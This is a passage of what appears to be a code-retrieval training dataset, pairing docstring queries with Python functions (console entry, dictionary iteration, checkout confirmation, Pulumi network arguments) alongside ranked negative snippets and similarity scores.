"0.47370613",
"0.47370613",
"0.47217062",
"0.47187388",
"0.47162774",
"0.47155774",
"0.47066417",
"0.46997574",
"0.4699366",
"0.46991035",
"0.4693562",
"0.46883234",
"0.46880096",
"0.46830177",
"0.46823943",
"0.46752512",
"0.46729076",
"0.4668943",
"0.4662293",
"0.4660086",
"0.46584556"
] | 0.7454566 | 0 |
This is the main entry for the console. | def main():
bp = Bin_API('COM10')
print('Testing')
bp.set_hwtrig_term(1) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def console_entry():\n #main()",
"def main():\n return",
"def main() -> None:\n return",
"def main() -> None:",
"def main() -> None:",
"def main() -> None:",
"def main() -> None:",
"def main():\n pass",
"def main():\n\tcli = Cli()\n\tcli.run()",
"def main(args=None):",
"def main(args=None):",
"def main(self) -> None:\n pass",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():",
"def main():\n\tpass",
"def main(args=None):\n pass",
"def main():\n Main()",
"def main():\n CLI_APP.run()",
"def main():\r\n print(\"JoJo\")",
"def main(args):",
"def main(args):",
"def main():\n\n pass",
"def main_cli():\n pass",
"def main():\n print(\"Call your main application code here\")",
"def main():\n print(\"Call your main application code here\")",
"def main():\n print(\"Call your main application code here\")",
"def main():\n ...",
"def main():\n print(\"is Running!\")",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main():\n pass",
"def main(ctx, verbose):\n return",
"def cli():\n pass",
"def cli():\r\n pass",
"def main(argv: Sequence[Text]) -> None:\n\n\n print(\"TODO\")",
"def main():\n pass",
"def cli():\n\n pass",
"def main(self):\r\n pass",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():",
"def cli():"
] | [
"0.8272837",
"0.79682225",
"0.7880587",
"0.77964354",
"0.77964354",
"0.77964354",
"0.77964354",
"0.7750121",
"0.7633499",
"0.7600834",
"0.7600834",
"0.7592275",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75276023",
"0.75211954",
"0.75097",
"0.7507609",
"0.7502285",
"0.7494331",
"0.7470814",
"0.7470814",
"0.74697",
"0.7467304",
"0.7461932",
"0.7461932",
"0.7461932",
"0.7459916",
"0.74566126",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7428984",
"0.7358481",
"0.73094827",
"0.73031455",
"0.7285269",
"0.7276882",
"0.72503686",
"0.7216856",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302",
"0.720302"
] | 0.0 | -1 |
If we don't define this, it will use the regular dictionary __iter__ which does not call SortedDictionary.keys(). | def __iter__(self):
for each in list(self.keys()):
yield each | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __iter__(self):\n return self.ordered_keys.__iter__()",
"def __iter__(self):\n return iter(self.keys())",
"def __iter__(self):\n if self._len_keys == 1:\n yield from self._dict.keys()\n else:\n for key in self._dict.keys():\n yield tuple(sorted(list(key)))",
"def __iter__(self):\n for x in sorted(self.keys()):\n yield self[x]",
"def __iter__(self):\n for key in sorted(self.keys):\n yield key, self[key]",
"def __iter__(self):\n # Return an iterator for the keys in the underlying dictionary.\n return iter(self.data)",
"def __iter__(self) -> iter:\n return iter(self._dict)",
"def iterkeys(self):\n return DictKeysIterator(self)",
"def __iter__(self):\n return iter(self._key_order)",
"def __iter__(self):\n\t\treturn self.keys()",
"def __iter__(self):\n return self.keys()",
"def iterkeys(self):",
"def iterkeys(self):",
"def iterkeys(self):\n return self.__iter__()",
"def __iter__(self):\n\n return iter([key for key in self._data.keys()])",
"def _map___iter__(self):\n return self.iterkeys()",
"def __iter__(self) -> Generator:\n for k in self.raw.keys():\n yield k",
"def __iter__(self) -> Iterator[str]:\n return iter(self._keys)",
"def __iter__(self):\n\t\tfor key, value in self.__dict__.iteritems():\n\t\t\tif key[0] != '_':\n\t\t\t\tyield value",
"def iterkeys(d):\r\n return iter(getattr(d, _iterkeys)())",
"def __iter__(self, *args, **kwargs):\n for key in self.keys(*args, **kwargs):\n yield key",
"def __iter__(self):\n return iter({})",
"def __iter__(self):\n\n return self._entries.__iter__()",
"def __iter__(self):\n return iter(self._internals.values())",
"def __iter__(self):\n for domain in self.keys():\n yield domain",
"def iterkeys(d):\n return iter(getattr(d, _iterkeys)())",
"def __iter__(self):\n return self._data_dict.__iter__()",
"def __iter__(self):\n return iter(self.items)",
"def __iter__(self):\n return iter(self.items)",
"def __iter__(self):\n for value in self.__dict__.values():\n yield value",
"def iteritems(self):\n return DictItemsIterator(self)",
"def __iter__(self):\n cursor=0\n while cursor<len(self):\n yield self._item[cursor].key\n cursor+=1",
"def iterator(self):\n return self.KeyIterator()",
"def __iter__(self):\n alt_locs = self.keys()\n alt_locs.sort()\n for alt_loc in alt_locs:\n yield self[alt_loc]",
"def __iter__(self):\n\n # For each key in set of keys\n for key in self.keys_set:\n\n # Yield that key and associated value\n yield key, self.__getitem__(key)",
"def __iter__(self):\r\n return iter(self._items)",
"def __iter__(self):\r\n return iter(self._items)",
"def __iter__(self):\n for bucket in self._table:\n if bucket is not None:\n for key in bucket:\n yield key",
"def iteritems(self):\n def make_iter(self=self):\n keys = self.iterkeys()\n while True:\n key = keys.next()\n yield (key, self[key])\n return make_iter()",
"def __iter__(self):\n for acronym in self.keys:\n yield acronym, self.dict[acronym]",
"def iteritems(self):",
"def __iter__(self):\n yield from self._type_keys",
"def iterkeys(self, *args, **kwargs):\n self.__iter__(*args, **kwargs)",
"def __iter__(self):\n for v in self._items:\n yield v",
"def __init__(self):\n super(KeyIterator, self).__init__()\n self.iterator = self.ValueIterator()",
"def __iter__(self):\r\n for item in self._data:\r\n yield item # yield the KEY\r",
"def __iter__(self):\n return iter(self._items)",
"def __iter__(self):\n return iter(self._items)",
"def __iter__(self):\n return iter(self._d)",
"def __iter__(self):\n return self.in_order",
"def __iter__():",
"def __iter__():",
"def __iter__():",
"def __iter__():",
"def iteritems(self):\n for key in self:\n yield key, self[key]",
"def iteritems(self):\n for key in self:\n yield (key, self[key])",
"def __iter__(self):\n for key in sorted(self._points):\n yield key",
"def iterentries(self):\n for key in self.iterkeys():\n yield self.get(key)",
"def iterkeys(self):\r\n for wr in self.data.iterkeys():\r\n obj = wr()\r\n if obj is not None:\r\n yield obj",
"def iterkeys(self):\r\n for wr in self.data.iterkeys():\r\n obj = wr()\r\n if obj is not None:\r\n yield obj",
"def iterkeys(self):\n if PY2:\n return self._tagged.iterkeys()\n else:\n return self._tagged.keys()",
"def __iter__(self):\n for value in dict.__iter__(self):\n for count in range(self[value]):\n yield value",
"def __iter__ (self):\n return iter (self.containments.keys ())",
"def iterkeys(self):\n return iter(self._sequence)",
"def __iter__(self): # pragma: no cover\r\n return ((k, v) for k, v in vars(self).items() if not k.startswith(\"_\"))",
"def __iter__(self):\n yield from chain.from_iterable(self.data.values())",
"def __iter__(self):\n return iter(self.vert_dict.values())",
"def __iter__(self):\n return iterkeys(self._ngrams)",
"def __iter__( self ) :\n\n for entry in self.__entries : yield entry",
"def __iter__(self):\n with SessionContext(self.SessionClass) as session:\n keys = session.query(PAW2_DBObject.key)\n keys = [c[0] for c in keys]\n random.shuffle(keys)\n return keys.__iter__()",
"def __iter__(self):\n return iter(self.__iter())",
"def __iter__(self):\n \n return iter(self.vert_dict.values())",
"def iterkeys(d, **kw):\r\n return iter(getattr(d, _iterkeys)(**kw))",
"def iterkeys(d, **kw):\r\n return iter(getattr(d, _iterkeys)(**kw))",
"def __iter__(self) -> 'Dictionary':\n return copy.deepcopy(self)",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n pass",
"def __iter__(self):\n # This could be as simple as \"return self._getKeyList().__iter__()\"\n # but this performs some extra consistency checking to make sure the\n # key we iterate to actually exists, to keep us from crashing if\n # our db is a little out of sync with itself.\n\n # This is a nasty hack because our db seems prone to circular links\n nItems = 0\n for item in self._getKeyList():\n if item in self:\n yield item\n nItems += 1\n # NASTY HACK!\n if nItems > 1000:\n self.reindex()\n raise Exception(\"Circular link corrected, try again\")\n else:\n self._delKey(item)",
"def Keys(self) -> NameObjectCollectionBase.KeysCollection:",
"def __iter__(self):\n self._deduplicate()\n return iter(self._entries)",
"def __iter__(cls):\n return iter(cls.__by_number.values())",
"def iteritems(self):\r\n return six.iteritems(self._as_dict())",
"def keys(self):\n return iter(k for k, _ in self._pairs())",
"def __iter__(self):\n\n result = []\n\n # d - dict, p - path (keys sequence)\n def recurs_iter(d, p=None):\n p = p or []\n\n # k - key, v - value\n for k, v in iteritems(d):\n next_p = p + [k]\n if isinstance(v, dict):\n recurs_iter(v, next_p)\n else:\n result.append(tuple(next_p))\n\n recurs_iter(self.__dict__)\n\n return iter(result)",
"def keys(self):\n raise NotImplementedError('keys() should have been replaced by a metaclass')",
"def itervalues(self):\n for key in self:\n yield self[key]",
"def __iter__(self):\n try:\n i = self.db[self._headKey]\n while True:\n yield i\n i = self.db[self._getNextKey(i)]\n except KeyError:\n pass",
"def iterkeys(self):\n return iter(kvp.key for kvp in self.keyvaluepair_set.all())",
"def itervalues(self):\n return DictValuesIterator(self)",
"def iterkeys(self):\n return self._d.iterkeys()",
"def __iter__(self):\n return iter(self._items)\n # to use a generator, it would look like this...\n # for item in self._items: yield item",
"def iteroriginal(self):\n for key in self:\n vals = _dict_getitem(self, key)\n for val in vals[1:]:\n yield vals[0], val",
"def __iter__(self):\n if self.empty():\n return\n for node in self.root:\n yield node.key",
"def __iter__(self):\n return iter(self._cached)",
"def __iter__(self):\n raise NotImplementedError(\"__iter__\")"
] | [
"0.8112754",
"0.7881003",
"0.7754839",
"0.76607627",
"0.764876",
"0.7564836",
"0.7504256",
"0.75019187",
"0.74793774",
"0.7474488",
"0.74243957",
"0.7364466",
"0.7364466",
"0.73356414",
"0.7253679",
"0.72350866",
"0.7233559",
"0.7106118",
"0.7090561",
"0.7053434",
"0.69872856",
"0.6984348",
"0.69795036",
"0.6972673",
"0.69265544",
"0.6869416",
"0.6839497",
"0.6831577",
"0.6831577",
"0.680716",
"0.6785401",
"0.6784434",
"0.67601216",
"0.6744813",
"0.6743477",
"0.67005265",
"0.67005265",
"0.67004776",
"0.6691876",
"0.66811323",
"0.6667628",
"0.66597563",
"0.66523415",
"0.663862",
"0.6625783",
"0.66251564",
"0.6622411",
"0.6622411",
"0.66188383",
"0.6582584",
"0.65758693",
"0.65758693",
"0.65758693",
"0.65758693",
"0.65719956",
"0.6571139",
"0.65688634",
"0.656793",
"0.65648437",
"0.65648437",
"0.65610987",
"0.65422887",
"0.6512388",
"0.6477373",
"0.6475892",
"0.6474237",
"0.6432229",
"0.64262855",
"0.63843524",
"0.63768554",
"0.6374607",
"0.6357363",
"0.6341298",
"0.6341298",
"0.6341179",
"0.6336935",
"0.6336935",
"0.6336935",
"0.6336935",
"0.6336935",
"0.6336935",
"0.6336935",
"0.63262063",
"0.6315084",
"0.63013166",
"0.62942415",
"0.62913424",
"0.62866557",
"0.62833667",
"0.62828916",
"0.6281372",
"0.62757266",
"0.6270366",
"0.62667423",
"0.62600166",
"0.62467104",
"0.62404144",
"0.6238442",
"0.6236912",
"0.6223479"
] | 0.7525102 | 6 |
End of checkout process controller. Confirmation is basically seeing. | def payment_confirmation(self, **post):
sale_order_id = view.session.get('sale_last_order_id')
partner_id = view.env.user.partner_id
if sale_order_id:
sale_order_id = view.env['sale.order'].sudo().browse(int(sale_order_id))
lines = sale_order_id.order_line
policy_line = view.env['policies.holder.line']
for line in lines:
code = ''.join(random.choice('0123456789ABCDEF') for i in range(16))
policy_line.sudo().create({'name':lines.product_id.id,
'premium':lines.price_unit,
'policy_code':code,
'line_id':partner_id.id,
'start_date':Datetime.now(), 'end_date':Datetime.to_string(timedelta(days=lines.product_id.policy_period*360)+ datetime.now())})
s = super(InsuranceWebsiteSale, self).payment_confirmation()
view.session['sale_last_order_id'] = False
return s
return | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def end(self):\n self.my_print(\"\\t[DONE]\", msg_types.INFO)\n self.in_progress = False",
"def exit(self): \n self.teo_exchange_intent = self.teo_wallet\n self.withdraw_intent = self.euro_wallet\n\n self.register_teo_exchange(self.teo_exchange_intent)\n self.register_withdraw(self.withdraw_intent)\n\n if self.teo_wallet + self.euro_wallet == 0:\n print('Agent exited: ', self.__class__.__name__)\n self.model.schedule.remove(self)",
"def exit(self) -> None:\n\n self.result = self.handle_success('finished-task')",
"def _end(self):\n\n self.logger.msg1(\"Done\")",
"def onCheckout(self, controller):\n \n if askokcancel(\"Proceed\", \"Pay the order?\"):\n c = controller.customer\n package = {'customer_id':c.id, 'order_price':c.my_order.GetTotalPrice}\n msg = controller.transmit(package)\n \n if msg['order_received']:\n c.CheckOut(c.my_order.GetTotalPrice)\n c.Clear()\n controller.show_frame(PageThree)",
"def order_finish(self):\r\n logger.info(f'Remaining qty:{self.quantity-self.filled_quantity}')\r\n self.is_active = False\r\n self.is_finished = True\r\n self.is_trading = False\r\n schedule.clear(tag=self.id)\r\n logger.info(f'Order {self.id} is finished')",
"def end(self):\n self._log.debug('%s: doing ..', __class__.__name__)\n self._log.debug('%s: done.', __class__.__name__)",
"def confirm_exit(self):\n return True",
"def exit(self):\n self.client.logout(self.creds, self.environment)\n self.transport.close()",
"def endCompetition(self):\n self.robot_exit = True",
"def end(self):\n if self.flowComponent:\n self.flowComponent.end()\n pass",
"def end(self):\n pass",
"def end(self):\n pass",
"def end(self):\n pass",
"def finish():\n pass",
"def end(self):\n ...",
"def finish(self) -> None:\n self.__exit__(None, None, None)",
"def finish(self):\n pass",
"def finish(self):\n pass",
"def do_exit(self, _):\n return True",
"def exit(self):\n logger.debug(\"EXIT\")",
"def exit(self) -> None:\n logger.info(messages.general(\"Thank You for using FooTools.\\n\"))\n exit()",
"def finished(self):\n\t\telog(\"finished\")",
"def end(self):\n self._log.debug('doing ..')\n super().end()\n\n self._log.debug('done')",
"def state_finish_exit(cfg, app, win):",
"def terminated(self):\n gc3libs.log.debug(\" ...done.\")",
"def send_finish_event(self):\n self.status['type'] = '__end__'\n self._send()",
"def end(self):\n self._bc.close()",
"def notify_end(self, status, objective):\n pass # pragma: no cover",
"def finish():",
"def finish():",
"def finish():",
"def finish():",
"def exit(self):\n pass",
"def exit(self):\n self.exit_flag = True",
"def report_end(self):\r\n print(f\"\\n\\n\\n{datetime.now()}\\tDone\\n\")",
"def finish_successful_request(self):\n self.session_manager.finish_successful_request()",
"def done_action(self) -> None:\n self.end = datetime.now()",
"def end():\n logging.info(\"Execution Ended\")",
"def finish(self):",
"def finish(self):",
"def do_quit(self, arg):\n cprint(('Thankyou for Using this todo Application!'), 'yellow')\n exit()",
"def endTransaction(self, transactionID: int) -> None:\n ...",
"def exit_client(self):\r\n\r\n sys.exit()",
"def _exit(self, save_vars):\n raise NotImplementedError()",
"def do_exit(self,*args):\r\n return True",
"def endMessage(self):",
"def exit(self):\n print(\"\"\"\\n\n ________________________________________\n\n Thank you for using\n your HABITSBOX today\n ________________________________________\n \"\"\")\n self.analytics.close()\n sys.exit(0)",
"def end(self) -> None:",
"def end(self, commit: bool) -> None:\n ...",
"def __procFinished(self, exitCode, exitStatus):\n self.__finish()",
"def RequestHandler_finish(self):\n if self.request._oboe_finish_ev and self.request._oboe_ctx and self.request._oboe_ctx.is_valid():\n ev = self.request._oboe_finish_ev\n ctx = self.request._oboe_ctx\n if hasattr(self, 'get_status'): # recent Tornado\n ev.add_info(\"Status\", self.get_status())\n elif hasattr(self, '_status_code'): # older Tornado\n ev.add_info(\"Status\", self._status_code)\n\n ev.add_edge(oboe.Context.get_default())\n ctx.report(ev)\n\n # clear the stored oboe event/metadata from the request object\n self.request._oboe_ctx = None\n self.request._oboe_finish_ev = None",
"def __finish(self):\n self.__current_control_node = None\n self._on_finish()\n self.__state = Process.IDLE\n if self.should_terminate():\n self.__terminated = True",
"def end(update, context) -> int:\n update.callback_query.edit_message_text(\n 'Bye! I hope we can talk again some day.')\n\n logger.info(\"User [%s] exited the conversation, [Exit], from [Main Menu / Results State].\",\n update.callback_query.message.chat.first_name)\n return ConversationHandler.END",
"def on_exit(self):\n pass",
"def _exit() -> None:\n\n print(\n \"Thanks for using TbSET. \"\n \"See you next time!\\n\"\n )",
"def quit(self):\n \n # Say good bye\n endMsg = 'controller:: Signing Off!'\n print endMsg\n self.dbF.writerow([endMsg]) \n \n # Close serial connections\n self.sp.closeSer()\n self.tc.closeSer()\n self.ard.closeSer()\n \n # Close log files\n self.dataLogFile.close()\n self.debugLogFile.close()",
"def _finish(self):\n steppable_registry = CompuCellSetup.persistent_globals.steppable_registry\n steppable_registry.finish()\n self.close_frames()",
"def _terminate(self) -> None:\n if not jh.should_execute_silently() or jh.is_debugging():\n logger.info(f\"Terminating {self.symbol}...\")\n\n self.before_terminate()\n\n self._detect_and_handle_entry_and_exit_modifications()\n\n # fake execution of market orders in backtest simulation\n if not jh.is_live():\n store.orders.execute_pending_market_orders()\n\n if jh.is_live():\n self.terminate()\n return\n\n if self.position.is_open:\n store.app.total_open_trades += 1\n store.app.total_open_pl += self.position.pnl\n logger.info(\n f\"Closed open {self.exchange}-{self.symbol} position at {self.position.current_price} with PNL: {round(self.position.pnl, 4)}({round(self.position.pnl_percentage, 2)}%) because we reached the end of the backtest session.\"\n )\n # first cancel all active orders so the balances would go back to the original state\n if self.exchange_type == 'spot':\n self.broker.cancel_all_orders()\n # fake a closing (market) order so that the calculations would be correct\n self.broker.reduce_position_at(self.position.qty, self.position.current_price, self.price)\n self.terminate()\n return\n\n if len(self.entry_orders):\n self._execute_cancel()\n logger.info('Canceled open-position orders because we reached the end of the backtest session.')\n\n self.terminate()",
"def finish(self):\n self.body.finish()",
"def on_end(self, ctx):\n pass",
"def exit(self) -> None:\n self.on_exit(None)",
"def endExecute( self ):\n self.oDialogControl.endExecute()",
"def end(self):\n\n # if the device is a PBR, try to turn off the pump before ending. In case of problems, keep trying for\n # 3 minutes before giving up.\n if self.device_details['device_type'] == 'PBR':\n pump_id = self.device_details['setup']['pump_id']\n counter = 0\n while counter < 60:\n try:\n result = True, self.device.set_pump_state(pump_id, False)\n except Exception as e:\n result = False, e\n\n response = [(datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")),\n self.device_details['node_id'],\n self.device_details['device_type'],\n 8,\n [pump_id, False],\n result,\n 'internal']\n\n self.log.update_log(*response) # log the change in pump state (or the cause of failure)\n\n # end the loop if the pump has been successfully turned off\n if result[0]:\n break\n else:\n counter += 1\n sleep(3)\n\n self.device.disconnect()",
"def end_phase():\n pass",
"def END(self):\n log.debug(\"All packets successfully transmitted!\")",
"def on_exit(self, userdata):\n pass",
"def quit_game(self):\n self.done = True",
"def app_fin_done(self):\n if self.task_queue.empty() and self.task_completed_queue.qsize() > 0:\n self.task_completed_queue.get()\n send_str = MSG_wrapper(wid=self.wid)\n self.client.send_string(send_str, len(send_str), 0, Tags.LOGOUT)",
"def proceed(self):\n pass",
"def finish(self):\r\n\r\n self._is_finished = True",
"def exit(self):\n if self._isSubProcessRunning() and self._exitCommand is not None:\n self.__process.stdin.write(self._exitCommand)\n self.__process.stdin.write(os.linesep)\n self.__process.stdin.flush()\n time.sleep(0.5)\n \n if self._isSubProcessRunning() :\n self.__process.kill()\n time.sleep(0.1)\n print 'Done!'",
"def end(self, won, reason):\n pass\n # replace with your end logic",
"def finish(self):\n if self.state == STATE_FINISH_ERROR:\n self.on_error('Something went wrong. :( Please see log.')\n else:\n self.on_finish()\n self.log_file.close()\n self.state = STATE_TERMINAL",
"def end_workunit(self, workunit):\r\n pass",
"def end_workunit(self, workunit):\r\n pass",
"def control_end_wc(self, errormsg):\n self.report(errormsg) # because return_results still fails somewhen\n self.ctx.errors.append(errormsg)\n self.return_results()",
"def end(self):\n #self.manipulator_restore()\n #self.header_text_restore()\n #self.cursor_modal_restore()\n pass",
"def finish_task(self):\n self.report_total_usage()\n if self.retry:\n self.retry = False\n self.curr_retries = 0\n self.state = \"done\"\n self.ready_for_step += 1\n self.RM.release_allocation(self, self.using.nodes)\n self.using.clear()\n self.curr_exec_time = 0\n # log message\n self.fwk.logEvent(self.sim.name, self.name, \"finish_task\", \"finished running\")",
"def exit(self):\n print(\"\\n***************************** Exit Metafor *****************************\")",
"def on_exit(self):\n if tkMessageBox.askyesno(\"Exit\", \"Do you want to quit the application?\"):\n self.logger(\"Program shutdown properly..\\n\")\n self.master.destroy()\n self.endCommand()",
"def end(c: Composition) -> None:\n c.run(\"testdrive\", \"verify-data.td\")",
"def exit(context):\n return _nfc.exit(context)",
"def action_done(self):\n pass",
"def Finish(self):\n pass",
"def checkoutComplete(request):\n\n\tif request.method == \"GET\":\n\n\t\thtml_content = {\n\t\t\t\"order_id\": request.GET.get('order'),\n\t\t\t\"error_message\": request.GET.get('er'),\n\t\t}\n\t\treturn render(request, \"lost-empire/site_templates/transactions/complete.html\", html_content)",
"async def end(self, roles, dialogs):\n self.ended = True",
"def finish(self) -> None:",
"def finish(self) -> None:",
"def present_exit_massage(self):\n print(\"Thank you for using the calculator....\")",
"def shutdown(self):\r\n self.done = True",
"def sendEnd(self):\n self._sendCommonMessage(self.SONY_MSG_Common_Bye, self.ThreeValueMsg.pack(a=0, b=0, c=0))",
"def exit(self):\n self.current.exit()",
"def end(self) -> None:\n return",
"def tpc_finish(self, transaction):\n raise NotImplementedError",
"def onExit(self, event):\r\n\t\tdlg = wx.MessageDialog(self, \"Are you sure you wish to exit?\",\r\n\t\t\t\t\t\t\t\"Confirm Exit\", wx.CANCEL|wx.OK|wx.ICON_QUESTION)\r\n\t\tresult = dlg.ShowModal()\r\n\t\tdlg.Destroy()\r\n\t\tif result == wx.ID_OK: sys.exit()",
"def end(self):\n self.shutdown = True",
"def exit_handler(self):\n self.logger.debug(\n \"Starting script shutdown in the class \" +\n self.__class__.__name__\n )\n\n # Clean up dead processes before exiting\n self.cleanup_dead_processes()\n \"\"\"\n print(\"FAKELOG: [\" + time.strftime(\"%c\") + \"] [UnisonCTRL] Exiting\\n\")\n \"\"\"\n self.logger.debug(\n \"Script shutdown complete in class \" +\n self.__class__.__name__\n )\n\n self.logger.info(\"Exiting UnisonCTRL\")",
"def finish(self):\n if self.serial:\n self.serial.close()",
"def __exit(self, exit_code=0):\r\n self._workspace_manager.stopAutoLoader()\r\n self._workspace_manager.stopReportManager()\r\n\r\n self._main_window.hide()\r\n print \"Closing Faraday...\"\r\n self._workspace_manager.saveWorkspaces()\r\n envs = [env for env in self._shell_envs.itervalues()]\r\n for env in envs:\r\n env.terminate() \r\n \r\n print \"stopping model controller thread...\"\r\n self._model_controller.stop()\r\n print \"stopping model controller thread...\"\r\n self.qapp.quit()\r\n print \"Waiting for controller threads to end...\"\r\n self._model_controller.join()\r\n \r\n return exit_code",
"def closeEvent(self, event):\n sys.exit(0)"
] | [
"0.6969281",
"0.6882413",
"0.6855795",
"0.6694447",
"0.65295106",
"0.65165967",
"0.644258",
"0.6396555",
"0.6290332",
"0.62667876",
"0.6263875",
"0.625368",
"0.625368",
"0.625368",
"0.62194836",
"0.6208796",
"0.62025553",
"0.6159344",
"0.6159344",
"0.6155485",
"0.6152719",
"0.61516094",
"0.6122213",
"0.6108549",
"0.6055314",
"0.60292494",
"0.60239977",
"0.6001598",
"0.6000663",
"0.59955853",
"0.59955853",
"0.59955853",
"0.59955853",
"0.59933823",
"0.598858",
"0.5983542",
"0.5982422",
"0.59806365",
"0.5967326",
"0.5967089",
"0.5967089",
"0.5957592",
"0.5956963",
"0.59494305",
"0.594366",
"0.59369767",
"0.59326476",
"0.5923427",
"0.59227693",
"0.59226525",
"0.59188384",
"0.5916293",
"0.5914076",
"0.589794",
"0.58854234",
"0.5883535",
"0.5882093",
"0.587902",
"0.5878182",
"0.58724785",
"0.58685267",
"0.5860456",
"0.5858876",
"0.5857884",
"0.5849723",
"0.58463854",
"0.58346903",
"0.58246076",
"0.5819733",
"0.581148",
"0.5798062",
"0.57946754",
"0.5786037",
"0.5784778",
"0.5781315",
"0.5781315",
"0.5779483",
"0.5776912",
"0.57751095",
"0.5774306",
"0.57742274",
"0.5762631",
"0.5760552",
"0.57591206",
"0.5756046",
"0.5742907",
"0.57358664",
"0.57324994",
"0.57324994",
"0.57118493",
"0.57111305",
"0.57099247",
"0.57027066",
"0.57017875",
"0.5701358",
"0.569795",
"0.56966406",
"0.5692897",
"0.5688983",
"0.56872654",
"0.5687046"
] | 0.0 | -1 |
The set of arguments for constructing an L3Network resource. | def __init__(__self__, *,
extended_location: pulumi.Input['ExtendedLocationArgs'],
l3_isolation_domain_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
vlan: pulumi.Input[float],
hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,
hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,
interface_name: Optional[pulumi.Input[str]] = None,
ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,
ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,
ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,
l3_network_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
pulumi.set(__self__, "extended_location", extended_location)
pulumi.set(__self__, "l3_isolation_domain_id", l3_isolation_domain_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "vlan", vlan)
if hybrid_aks_ipam_enabled is None:
hybrid_aks_ipam_enabled = 'True'
if hybrid_aks_ipam_enabled is not None:
pulumi.set(__self__, "hybrid_aks_ipam_enabled", hybrid_aks_ipam_enabled)
if hybrid_aks_plugin_type is None:
hybrid_aks_plugin_type = 'SRIOV'
if hybrid_aks_plugin_type is not None:
pulumi.set(__self__, "hybrid_aks_plugin_type", hybrid_aks_plugin_type)
if interface_name is not None:
pulumi.set(__self__, "interface_name", interface_name)
if ip_allocation_type is None:
ip_allocation_type = 'DualStack'
if ip_allocation_type is not None:
pulumi.set(__self__, "ip_allocation_type", ip_allocation_type)
if ipv4_connected_prefix is not None:
pulumi.set(__self__, "ipv4_connected_prefix", ipv4_connected_prefix)
if ipv6_connected_prefix is not None:
pulumi.set(__self__, "ipv6_connected_prefix", ipv6_connected_prefix)
if l3_network_name is not None:
pulumi.set(__self__, "l3_network_name", l3_network_name)
if location is not None:
pulumi.set(__self__, "location", location)
if tags is not None:
pulumi.set(__self__, "tags", tags) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __init__(__self__,\n resource_name: str,\n args: CloudServicesNetworkArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: ManagedNetworkGroupArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def Args(parser):\n type_choices = {\n 'STANDARD':\n 'Standard network type used for private cloud connectivity. A '\n 'VMware Engine network of type STANDARD is a global resource.',\n 'LEGACY':\n 'Network type used by private clouds created in projects without a'\n ' network of type STANDARD. This network type is only used for new'\n ' PCs in existing projects that continue to use LEGACY network. A '\n 'VMware Engine network of type LEGACY is a regional resource.'\n }\n flags.AddNetworkToParser(parser, positional=True)\n base.ASYNC_FLAG.AddToParser(parser)\n base.ASYNC_FLAG.SetDefault(parser, True)\n parser.display_info.AddFormat('yaml')\n parser.add_argument(\n '--description',\n help=\"\"\"\\\n Text describing the VMware Engine network.\n \"\"\")\n parser.add_argument(\n '--type',\n required=True,\n choices=type_choices,\n help=\"\"\"Type of the VMware Engine network.\"\"\")",
